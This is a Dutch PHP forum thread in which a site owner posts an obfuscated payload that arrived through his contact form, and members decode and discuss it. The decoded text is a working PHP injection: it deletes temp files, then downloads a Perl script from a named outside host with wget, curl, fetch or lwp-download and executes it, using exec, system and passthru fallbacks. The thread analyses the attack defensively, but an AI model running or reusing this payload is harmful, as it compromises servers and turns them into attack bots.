malware hack poging

Overzicht Reageren

Sponsored by: Vacatures door Monsterboard

.Net Ontwikkelaar

Dit ga je doen Het ontwerpen en ontwikkelen van software voor klanten; Het bijdragen van kennis en ervaring; Het integreren van van de software en afstemmen met klanten; Het functioneel testen van de ontwikkelde software. Hier ga je werken Voor onze relatie zijn wij momenteel op zoek naar een .Net Developer die wilt werken aan software die draait op machines wereldwijd. De organisatie produceert software voor applicaties die gebruikt worden in verschillende branches. De software wordt geleverd aan fabrikanten van verschillende robotica en machines. Als .Net ontwikkelaar ben je intern onderdeel van het team wat de applicatie omgevingen ontwikkeld en

Bekijk vacature »

Starter/junior Magento developer gezocht!

Functie Je komt te werken in een zelfsturend team waarin vertrouwen voorop staat en inbreng en ideeën worden gewaardeerd. Ook staat innovatie centraal. Ze bieden jou de mogelijkheid om jezelf door te ontwikkelen. Denk hierbij aan cursussen en een persoonlijk ontwikkelplan. Je komt terecht in het team van momenteel 4 (ervaren) collega’s en zal meewerken aan de doorontwikkeling en nieuwbouw van de Magento platformen van meerdere opdrachtgevers volgens Agile/Scrum. Denk hierbij aan nieuwe functionaliteiten, UX en koppelingen met verschillende back-end systemen. Als starter/junior developer zul je direct begeleid worden door een senior uit het team. Het is van belang dat

Bekijk vacature »

Junior PHP Developer

Je maakt een vliegende start van je carrière, door meteen mee te bouwen aan de digitale aspecten van Coolblue. Wat doe je als Junior PHP Developer bij Coolblue? Als Junior PHP Developer ben je meteen vanaf de start onderdeel van een development team. Je kijkt veel mee met collega’s en volgt trainingen om te groeien als Junior Developer. Op dat moment komt je wil om steeds te blijven leren naar boven. Daarnaast pak je in de sprints ook je eigen stories op om Coolblue iedere dag een beetje beter te kunnen maken. Je sterk analytisch vermogen komt dan ook goed

Bekijk vacature »

Fullstack of back-end PHP developer

Functie Ieder onderdeel van de software draait op aparte servers en het bestaat dus echt uit verschillende componenten. Het team bestaat uit 4 developers, een klein team dus met korte lijnen. Alles in intern ontwikkeld en je werkt aan alle facetten. Van uitbreiding van de core tot maatwerk voor de klant. Ook liggen er verschillende uitdagingen op servervlak en databases. Je zult de eerste periode veel samenwerken met de lead developer om vervolgens echt je gang te gaan binnen de software. In het team streven ze naast de hoogst haalbare kwaliteit. Hiervoor werken ze nauw met elkaar samen en levert

Bekijk vacature »

C#.NET Developer

Dit ga je doen Ontwikkelen van de Back-end in .NET6 / C# en WebAPI (Focus);) Ontwikkelen van de Front-End in Nodje.js en Angular (secundair); Opstellen van een technisch ontwerp; Testen, documenteren en implementeren van de nieuwe applicatie; Verzorgen van de nazorg, na de implementatie; Het oplossen van bugs en incidenten. Hier ga je werken Als C#.NET Developer binnen deze organisatie kan jij het verschil maken. Zij werken momenteel nog met programmatuur die is ontwikkeld in C++. Hiervan gaan zij afscheid nemen zodra alle nieuwe software in C#.NET geschreven is. Een grootschalig en langdurig project. Voor hen is deze software van

Bekijk vacature »

Medior PHP Developer

Functie omschrijving We are looking for a dutch native speaker Wil jij als developer werken bij een interne organisatie en de eigen software verder helpen ontwikkelen? Lees dan snel verder! In deze functie ga je werken als PHP Developer en de interne software en applicaties verder ontwikkelen. In het kort houdt dit in: Je gaat de interne applicaties en software verder optimaliseren. Verder bouw je verschillende API's en koppelingen tussen systemen. Je gaat het CRM-systeem door middel van PHP verder ontwikkelen. Ook ga je collega's ondersteunen bij vragen over de software en applicaties. Bedrijfsprofiel Dit bedrijf is actief in het

Bekijk vacature »

Senior .NET developer

Functie As a Senior .NET developer you will work in our Research & development team. Our team consists of 17 colleagues! We are currently busy setting up a completely new architecture for a new product. We use VS2022 and .NET 6.0 for our new product. Your function is therefore mainly backend oriented. Since we develop measuring equipment for the chemical industry, it is also very important to develop high-quality software for its control. You are also responsible for designing, implementing and testing new features. For this position its also very important to ensure future-proof and sustainable architecture. Eisen - A

Bekijk vacature »

.NET Developer

Dit ga je doen Binnen het team bouw je aan een applicatie met andere .Net Developers, testers een Product Owner en een Business Analyst. Met het team wordt de backlog besproken. In overleg claim jij jouw deel en zorgt ervoor dat onderhoud en innovatie wordt gerealiseerd. Het project dat momenteel draait is het opgraden van de omgeving. Doorontwikkelen van de huidige applicatie; Overleggen met teamleden om de backlog te verdelen; Onderhouden van de huidige omgeving; Sparren met de business en het ophalen van nieuwe requirements. Hier ga je werken De organisatie is een van de grootste landelijke aanbieder van diverse

Bekijk vacature »

Senior Node.js developer Digital Agency

Functie Door de groei van de organisatie zijn ze op zoek naar een Tech Lead. Als tech lead ben jij verantwoordelijk Als Back end Node.js developer kom je terecht in een van de 8 multidisciplinaire teams in het projectenhuis. Afhankelijk van jouw interesses, wensen en capaciteiten word je bij projecten en onderwerpen naar keuze betrokken. Als ervaren ontwikkelaar zul jij vaak leiding nemen in de projecten en in het team een aanvoerder zijn van technische discussies. Uiteindelijk wil jij natuurlijk de klantwensen zo goed mogelijk vertalen naar robuuste code. De projecten kunnen varieren van langlopende- tot kleinschalige trajecten. Voorheen werkte

Bekijk vacature »

Java Developer

Java/Kotlin Developer Ben jij een ervaren Java/Kotlin developer met een passie voor het automatiseren van bedrijfsprocessen? Wil je graag deelnemen aan uitdagende projecten bij aansprekende klanten? En ben je op zoek naar een professioneel, ambitieus en dynamisch bedrijf om je carrière verder te ontwikkelen? Kom dan ons team bij Ritense in Amsterdam versterken! Zo ziet de functie eruit: Als Java/Kotlin developer bij Ritense ben je verantwoordelijk voor de ontwikkeling en implementatie van applicaties die bedrijfsprocessen automatiseren, zodat onze klanten slimmer, efficiënter en klantgerichter kunnen werken. Als developer ben je in de lead en zorg je voor de correcte oplevering van

Bekijk vacature »

Als Lead PHP developer bijdragen aan het onderwijs

Functie Als Lead PHP developer zet je samen met het team en de andere lead developers de technische lijnen uit als het gaat om het ontwikkelen van de applicaties en bepaal je samen met de PO waar elke sprint aan gewerkt zal worden. Je kunt op basis van een user story een goede aanpak formuleren en een planning opstellen, en andere hierin meenemen. Wanneer je team code schrijft verwacht je degelijke oplossingen, bij voorkeur gebruik makend van Domain Driven Design. Je ziet toegevoegde waarde in het beoordelen van het werk van collega’s om zo samen te streven naar hoge kwaliteit

Bekijk vacature »

Software developer (Python)

Functie Je komt te werken in het IT-team bestaande uit de Lead developer en 4 (medior/senior) developers. Gezamenlijk werken jullie aan de verbetering en uitbreiding van de software. Binnen het development team is er veel vrijheid en zelfstandigheid, zonder dat ze hiermee afdoen aan de kwaliteit. Zo hebben ze elke ochtend een korte stand-up (10:00 uur) en houden ze zo nu en dan pair-programming sessies. Ook is er een hele professionele ontwikkelcyclus waarbij code altijd eerst door een collega wordt getest voordat het naar deployement gaat. Je hebt in je werk oog voor kwaliteit, risico’s en het klantbelang. Communicatie met

Bekijk vacature »

Oracle APEX developer

Wat je gaat doen: Als Oracle APEX ontwikkelaar bij DPA werk je samen met collega’s aan de meest interessante opdrachten. Je zult je ervaring met SQL, PL/SQL, JavaScript, HTML en CSS inzetten om wensen van opdrachtgevers te vertalen naar technische oplossingen. Je werk is heel afwisselend, omdat DPA zich niet beperkt tot een specifieke branche. Zo ben je de ene keer bezig binnen de zorgsector, de andere keer is dit bij de overheid. Wat we vragen: Klinkt goed? Voor deze functie breng je het volgende mee: Je hebt een hbo- of universitaire opleiding afgerond Je hebt 2 tot 5 jaar

Bekijk vacature »

Medior Front-end Developer

Sogeti is een organisatie met een goede werksfeer en zo min mogelijk hiërarchische verhoudingen. Ga je bij ons als Medior Front-end Developer aan de slag? Dan werk je dagelijks met collega’s aan de mooiste IT-projecten. Deze snelgroeiende groep collega’s krijgt energie van hun vak en dat merk je op de werkvloer. Onze klantenkring is groot en divers, dat vraagt om flexibiliteit van jou. Tegelijkertijd betekent dit dagelijks nieuwe dingen leren én dat geen werkdag hetzelfde is. Natuurlijk krijg jij de mogelijkheid je te certificeren. We organiseren regelmatig technische Meet-ups en doen we veel aan kennisdeling waarbij iedereen welkom is, zowel

Bekijk vacature »

Developer

Functie omschrijving In deze functie ga je werken als C# Developer. Jij gaat aan de slag met de volgende taken: Maatwerk software bouwen; Huidige softwareprojecten verder uitbouwen en optimaliseren; Ideeën van de klant omzetten naar handige oplossingen en tools; Bovenstaande doe je middels de Microsoft- stack: C#, ASP.NET en MVC/ Entity Framework. Ben je net afgestudeerd aan een HBO opleiding Informatica, aarzel dan niet om te solliciteren. Dit is namelijk de ideale startersfunctie! Bedrijfsprofiel Deze organisatie is gevestigd in de regio van Boxtel. Het is van oorsprong een familiebedrijf, die gestart zijn met het bouwen van websites. Dit is door

Bekijk vacature »
- Roland -

- Roland -

08/06/2014 11:19:32
Quote Anchor link
Nb. ik heb eval hier even vervangen door XXXX

Ik zie dit via een contact formulier binnenkomen:
Zou dit zo kunnen werken ?
[.php] is toch niet geldig (als alternative < ? p h p )

( . punt door mij toegevoegd )
Code (php)
PHP script in nieuw venster Selecteer het PHP script
1
2
3
4
5
[php]XXXX(base64_decode('ZWNobyAic2V4Y3JpbWUiOw==
ZWNobyUyMCUyMnYwcENyM3clM0NiciUzRSUyMiUzQiUwQWVjaG8lMjAlMjJzeXMlM0ElMjIucGhwX3VuYW1lJTI4JTI5LiUyMiUzQ2JyJTNFJTIyJTNCJTBBJTI0Y21kJTNEJTIyZWNobyUyMG5vYjBkeUNyM3clM0JjZCUyMC90bXAlM0JybSUyMC1yZiUyMGRvci4qJTIwKi50eHQuKiUzQmZldGNoJTIwaHR0cCUzQS8vd3d3LmxhLWJhdW1lLWRob3N0dW4uZnIvcGx1Z2lucy91c2VyL3Byb2ZpbGUvcHJvZmlsZXMvbG9nLnR4dCUzQnBlcmwlMjBsb2cudHh0JTNCcm0lMjAtcmYlMjBsb2cudHh0JTNCd2dldCUyMGh0dHAlM0EvL3d3dy5sYS1iYXVtZS1kaG9zdHVuLmZyL3BsdWdpbnMvdXNlci9wcm9maWxlL3Byb2ZpbGVzL2xvZy50eHQlM0JwZXJsJTIwbG9nLnR4dCUzQnJtJTIwLXJmJTIwbG9nLnR4dCUzQmN1cmwlMjAtTyUyMGh0dHAlM0EvL3d3dy5sYS1iYXVtZS1kaG9zdHVuLmZyL3BsdWdpbnMvdXNlci9wcm9maWxlL3Byb2ZpbGVzL2xvZy50eHQlM0JwZXJsJTIwbG9nLnR4dCUzQnJtJTIwLXJmJTIwbG9nLnR4dCUzQmx3cC1kb3dubG9hZCUyMGh0dHAlM0EvL3d3dy5sYS1iYXVtZS1kaG9zdHVuLmZyL3BsdWdpbnMvdXNlci9wcm9maWxlL3Byb2ZpbGVzL2xvZy50eHQlM0JwZXJsJTIwbG9nLnR4dCUzQmNkJTIwL3Zhci90bXAlM0JybSUyMC1yZiUyMGRvci4qJTIwKi5qcGcuKiUzQmZldGNoJTIwaHR0cCUzQS8vd3d3LmxhLWJhdW1lLWRob3N0dW4uZnIvcGx1Z2lucy91c2VyL3Byb2ZpbGUvcHJvZmlsZXMvbG9nLnR4dCUzQnBlcmwlMjBsb2cudHh0JTNCcm0lMjAtcmYlMjBsb2cudHh0JTNCd2dldCUyMGh0dHAlM0EvL3d3dy5sYS1iYXVtZS1kaG9zdHVuLmZyL3BsdWdpbnMvdXNlci9wcm9maWxlL3Byb2ZpbGVzL2xvZy50eHQlM0JwZXJsJTIwbG9nLnR4dCUzQnJtJTIwLXJmJTIwbG9nLnR4dCUzQmN1cmwlMjAtTyUyMGh0dHAlM0EvL3d3dy5sYS1iYXVtZS1kaG9zdHVuLmZyL3BsdWdpbnMvdXNlci9wcm9maWxlL3Byb2ZpbGVzL2xvZy50eHQlM0JwZXJsJTIwbG9nLnR4dCUzQnJtJTIwLXJmJTIwbG9nLnR4dCUzQmx3cC1kb3dubG9hZCUyMGh0dHAlM0EvL3d3dy5sYS1iYXVtZS1kaG9zdHVuLmZyL3BsdWdpbnMvdXNlci9wcm9maWxlL3Byb2ZpbGVzL2xvZy50eHQlM0JwZXJsJTIwbG9nLnR4dCUzQiUyMiUzQiUwQSUyNGVzZWd1aWNtZCUzRGV4JTI4JTI0Y21kJTI5JTNCZWNobyUyMCUyNGVzZWd1aWNtZCUzQiUwQWZ1bmN0aW9uJTIwZXglMjglMjRjZmUlMjklN0IlMEElMjRyZXMlMjAlM0QlMjAlMjclMjclM0IlMEFpZiUyMCUyOCUyMWVtcHR5JTI4JTI0Y2ZlJTI5JTI5JTdCJTBBaWYlMjhmdW5jdGlvbl9leGlzdHMlMjglMjdleGVjJTI3JTI5JTI5JTdCJTBBQGV4ZWMlMjglMjRjZmUlMkMlMjRyZXMlMjklM0IlMEElMjRyZXMlMjAlM0QlMjBqb2luJTI4JTIyJTVDbiUyMiUyQyUyNHJlcyUyOSUzQiUwQSU3RCUwQWVsc2VpZiUyOGZ1bmN0aW9uX2V4aXN0cyUyOCUyN3NoZWxsX2V4ZWMlMjclMjklMjklN0IlMEElMjRyZXMlMjAlM0QlMjBAc2hlbGxfZXhlYyUyOCUyNGNmZSUyOSUzQiUwQSU3RCUwQWVsc2VpZiUyOGZ1bmN0aW9uX2V4aXN0cyUyOCUyN3N5c3RlbSUyNyUyOSUyOSU3QiUwQUBvYl9zdGFydCUyOCUyOSUzQiUwQUBzeXN0ZW0lMjglMjRjZmUlMjklM0IlMEElMjRyZXMlMjAlM0QlMjBAb2JfZ2V0X2NvbnRlbnRzJTI4JTI5JTNCJTBBQG9iX2VuZF9jbGVhbiUyOCUyOSUzQiUwQSU3RCUwQWVsc2VpZiUyOGZ1bmN0aW9uX2V4aXN0cyUyOCUyN3Bhc3N0aHJ1JTI3JTI5JTI5JTdCJTBBQG9iX3N0YXJ0JTI4JTI5JTNCJTBBQHBhc3N0aHJ1JTI4JTI0Y2ZlJTI5JTNCJTBBJTI0cmVzJTIwJTNEJTIwQG9iX2dldF9jb250ZW50cyUyOCUyOSUzQiUwQUBvYl9lbmRfY2xlYW4lMjglMjklM0IlMEElN0QlMEFlbHNlaWYlMjhmdW5jdGlvbl9leGlzdHMlMjglMjdwb3BlbiUyNyUyOSUyOSU3QiUwQSUyNGYlMjAlM0QlMjBAcG9wZW4lMjglMjRjZmUlMkMlMjJyJTIyJTI5JTNCJTBBd2hpbGUlMjglMjFAZmVvZiUyOCUyNGNmZSUyOSUyOSUyMCU3QiUyMCUyNHJlcyUyMC4lM0QlMjBAZnJlYWQlMjglMjRjZmUlMkMxMDI0JTI5JTNCJTIwJTdEJTBBQHBjbG9zZSUyOCUyNGYlMjklM0IlMEElN0QlN0QlMEFyZXR1cm4lMjAlMjRyZXMlM0IlMEElN0Q='));die();[/php]


Gewijzigd op 08/06/2014 11:26:02 door - Roland -
 
PHP hulp

PHP hulp

29/04/2024 13:37:19
 
- Ariën  -
Beheerder

- Ariën -

08/06/2014 13:37:29
Quote Anchor link
Ik vermoed dat dit een hack is voor een bepaald 3rd-party webapplicatie?
Krijg je dit in een mail binnen?
 
- Roland -

- Roland -

08/06/2014 14:22:43
Quote Anchor link
ja, ik laat de inhoud van het contact formulier aan mezelf mailen.


"een bepaald 3rd-party webapplicatie?" ??? heb ik op deze site niet (gewoon een eigen siteje)
 
Peter  Flos

Peter Flos

08/06/2014 15:42:36
Quote Anchor link
Ik heb deze voor je gedecodeerd:

Code (php)
PHP script in nieuw venster Selecteer het PHP script
1
echo%20%22v0pCr3w%3Cbr%3E%22%3B%0Aecho%20%22sys%3A%22.php_uname%28%29.%22%3Cbr%3E%22%3B%0A%24cmd%3D%22echo%20nob0dyCr3w%3Bcd%20/tmp%3Brm%20-rf%20dor.*%20*.txt.*%3Bfetch%20http%3A//www.la-baume-dhostun.fr/plugins/user/profile/profiles/log.txt%3Bperl%20log.txt%3Brm%20-rf%20log.txt%3Bwget%20http%3A//www.la-baume-dhostun.fr/plugins/user/profile/profiles/log.txt%3Bperl%20log.txt%3Brm%20-rf%20log.txt%3Bcurl%20-O%20http%3A//www.la-baume-dhostun.fr/plugins/user/profile/profiles/log.txt%3Bperl%20log.txt%3Brm%20-rf%20log.txt%3Blwp-download%20http%3A//www.la-baume-dhostun.fr/plugins/user/profile/profiles/log.txt%3Bperl%20log.txt%3Bcd%20/var/tmp%3Brm%20-rf%20dor.*%20*.jpg.*%3Bfetch%20http%3A//www.la-baume-dhostun.fr/plugins/user/profile/profiles/log.txt%3Bperl%20log.txt%3Brm%20-rf%20log.txt%3Bwget%20http%3A//www.la-baume-dhostun.fr/plugins/user/profile/profiles/log.txt%3Bperl%20log.txt%3Brm%20-rf%20log.txt%3Bcurl%20-O%20http%3A//www.la-baume-dhostun.fr/plugins/user/profile/profiles/log.txt%3Bperl%20log.txt%3Brm%20-rf%20log.txt%3Blwp-download%20http%3A//www.la-baume-dhostun.fr/plugins/user/profile/profiles/log.txt%3Bperl%20log.txt%3B%22%3B%0A%24eseguicmd%3Dex%28%24cmd%29%3Becho%20%24eseguicmd%3B%0Afunction%20ex%28%24cfe%29%7B%0A%24res%20%3D%20%27%27%3B%0Aif%20%28%21empty%28%24cfe%29%29%7B%0Aif%28function_exists%28%27exec%27%29%29%7B%0A@exec%28%24cfe%2C%24res%29%3B%0A%24res%20%3D%20join%28%22%5Cn%22%2C%24res%29%3B%0A%7D%0Aelseif%28function_exists%28%27shell_exec%27%29%29%7B%0A%24res%20%3D%20@shell_exec%28%24cfe%29%3B%0A%7D%0Aelseif%28function_exists%28%27system%27%29%29%7B%0A@ob_start%28%29%3B%0A@system%28%24cfe%29%3B%0A%24res%20%3D%20@ob_get_contents%28%29%3B%0A@ob_end_clean%28%29%3B%0A%7D%0Aelseif%28function_exists%28%27passthru%27%29%29%7B%0A@ob_start%28%29%3B%0A@passthru%28%24cfe%29%3B%0A%24res%20%3D%20@ob_get_contents%28%29%3B%0A@ob_end_clean%28%29%3B%0A%7D%0Aelseif%28function_exists%28%27popen%27%29%29%7B%0A%24f%20%3D%20@popen%28%24cfe%2C%22r%22%29%3B%0Awhile%28%21@feof%28%24cfe%29%29%20%7B%20%24res%20.%3D%20@fread%28%24cfe%2C1024%29%3B%20%7D%0A@pclose%28%24f%29%3B%0A%7D%7D%0Areturn%20%24res%3B%0A%7D


Dat is wat eruit komt. Lijkt inderdaad op een hack, het is in ieder geval een stuk script.

Edit: Ik heb er een link uit gevolgeld:

-Verwijderd-

Deze link leid naar een DDos-Script toe. Ik neem aan dat je je emails vanuit je server zelf, of door je host veilig verstuurt?
Gewijzigd op 08/06/2014 17:49:58 door Peter Flos
 
Obelix Idefix

Obelix Idefix

08/06/2014 16:37:24
Quote Anchor link
Misschien handig/verstandig om die link dan niet als hyperlink op te nemen, als het naar een ddos-script leidt....
 
Peter  Flos

Peter Flos

08/06/2014 17:50:31
Quote Anchor link
Bij deze weggehaald, het ging mij er enkel om om te laten zien dat het dus een ddos poging is geweest.
 
- Ariën  -
Beheerder

- Ariën -

08/06/2014 19:01:06
Quote Anchor link
- Roland - op 08/06/2014 14:22:43:
ja, ik laat de inhoud van het contact formulier aan mezelf mailen.


"een bepaald 3rd-party webapplicatie?" ??? heb ik op deze site niet (gewoon een eigen siteje)

Dan is er niks aan de hand, lijkt me.
 
Christian k

christian k

08/06/2014 20:32:10
Quote Anchor link
als je dit binnen krijgt zonder dat je het zelf geprogrammeerd hebt,
is er wel wat aan de hand lijkt mij?
of zit ik nu fout?
ik zie namelijk niet in hoe een script dit kan versturen zonder dat jij die functie
er in hebt gebouwt?
 
- Ariën  -
Beheerder

- Ariën -

08/06/2014 21:15:25
Quote Anchor link
Een botje die denkt dat je een lek 3rd party script gebruikt?
 



Overzicht Reageren

 
 

Om de gebruiksvriendelijkheid van onze website en diensten te optimaliseren maken wij gebruik van cookies. Deze cookies gebruiken wij voor functionaliteiten, analytische gegevens en marketing doeleinden. U vindt meer informatie in onze privacy statement.